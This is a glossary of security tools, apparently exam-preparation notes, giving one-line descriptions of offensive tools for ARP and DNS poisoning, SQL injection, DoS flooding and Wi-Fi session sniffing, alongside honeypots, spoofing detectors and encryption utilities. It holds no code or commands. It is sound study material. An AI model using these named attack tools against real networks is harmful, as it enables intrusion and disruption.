Enyx: Enyx is an enumeration tool that fetches the IPv6 address of a machine
through SNMP.

Habu: Habu is a hacking toolkit that provides various commands for performing ARP
poisoning attacks.

SPECTER: SPECTER is a honeypot or deception system. It simulates a complete system
and provides an appealing target to lure hackers away from production systems.

Traffic IQ Professional: Traffic IQ Professional is a tool that audits and
validates the behavior of security devices by generating the standard application
traffic or attack traffic between two virtual machines.

Mole: Mole is an automatic SQL injection exploitation tool. Given only a
vulnerable URL and a valid string on the site, it can detect the injection and
exploit it using the union technique or a Boolean query-based technique.

Yersinia: Yersinia is a network tool designed to take advantage of weaknesses in
different network protocols such as DHCP. It aims to be a solid framework for
analyzing and testing the deployed networks and systems.

BCTextEncoder: The BCTextEncoder utility simplifies the encoding and decoding of
text data. It compresses, encrypts, and converts plaintext data into text format,
which the user can then copy to the clipboard or save as a text file.

Secure Everything: Secure Everything uses AES encryption to secure SMS, videos,
images, audio files, etc. This tool also helps in securing credit card details,
bank account details, SSN, etc.

FileVault 2: FileVault full-disk encryption (FileVault 2) utilizes the XTS-AES-128
encryption technology along with a 256-bit key to prevent unauthorized access to
the information on the startup disk.

Netcraft: Netcraft provides Internet security services, including anti-fraud and
anti-phishing services, application testing, and PCI scanning.

Sublist3r: Sublist3r is a Python script designed to enumerate the subdomains of
websites using OSINT. It enables you to enumerate subdomains across multiple
sources at once.

theHarvester: theHarvester is a tool designed to be used in the early stages of a
penetration test. It is used for open-source intelligence gathering and helps to
determine a company's external threat landscape on the Internet.

RITA (Real Intelligence Threat Analytics): It is an open-source framework for
detecting command and control communication through network traffic analysis.

Spoof-Me-Now: Spoof-Me-Now is a program to change (spoof) your MAC address.

OmniPeek: OmniPeek Network Analyzer provides real-time visibility and expert
analysis of each part of the target network. This tool will analyze, drill down,
and fix performance bottlenecks across multiple network segments.

DerpNSpoof: DerpNSpoof is a DNS poisoning tool that assists in spoofing the DNS
query packet of a certain IP address or a group of hosts in the network.

ike-scan: ike-scan discovers IKE hosts and can fingerprint them using the
retransmission backoff pattern.

AnDOSid: AnDOSid allows the attacker to simulate a DoS attack (an HTTP POST flood
attack to be precise) and DDoS attack on a web server from mobile phones.

Xplico: The goal of Xplico is to extract the application data contained in an
Internet traffic capture. Xplico is an open source Network Forensic Analysis
Tool (NFAT). Xplico is released under the GNU General Public License.

Akamai: Akamai provides DDoS protection for enterprises regularly targeted by DDoS
attacks. Akamai Kona Site Defender delivers multi-layered defense that effectively
protects websites and web applications against the increasing threat,
sophistication, and scale of DDoS attacks.

Vindicate: Vindicate is an LLMNR/NBNS/mDNS spoofing detection toolkit for network
administrators. Security professionals use this tool to detect name service
spoofing.

Nmap: Many tools, such as Nmap, are available for the detection of promiscuous
mode. Nmap's NSE script sniffer-detect.nse checks whether a target on the local
Ethernet has its network card in promiscuous mode.

NAST: NAST detects other PCs in promiscuous mode by performing the ARP test.

FaceNiff: FaceNiff is an Android app that can sniff and intercept web session
profiles over the Wi-Fi network the phone is connected to. This app works on rooted
Android devices. The Wi-Fi connection should be to an open, WEP, WPA-PSK, or
WPA2-PSK network while sniffing the sessions.

OmniPeek: OmniPeek network analyzer provides real-time visibility and expert
analysis of each part of the target network. This tool will analyze, drill down,
and fix performance bottlenecks across multiple network segments. Attackers can use
this tool to analyze a network and inspect the packets in the network.

shARP: shARP is an anti-ARP-spoofing application that uses active and passive
scanning methods to detect and remove any ARP spoofer from the network.

FileVault: FileVault full-disk encryption (FileVault 2) uses XTS-AES-128 encryption
with a 256-bit key to help prevent unauthorized access to the information on your
startup disk.

CrypTool 1 (CT1) – It is written in C++ and is a Windows program. It supports
classical and modern cryptographic algorithms (encryption and decryption, key
generation, secure passwords, authentication, secure protocols, etc.). It is used
to perform cryptanalysis of several algorithms (Vigenère, RSA, AES, etc.).

CrypTool 2 (CT2) – It supports visual programming GUI and execution of cascades of
cryptographic procedures. It runs under Windows.

JCrypTool (JCT) – It allows comprehensive cryptographic experimentation on Linux,
Mac OS X, and Windows. It also allows users to develop and extend its platform in
various ways with their own crypto plug-ins.

CrypTool-Online (CTO) – It runs in a browser and provides a variety of encryption
methods and analysis tools.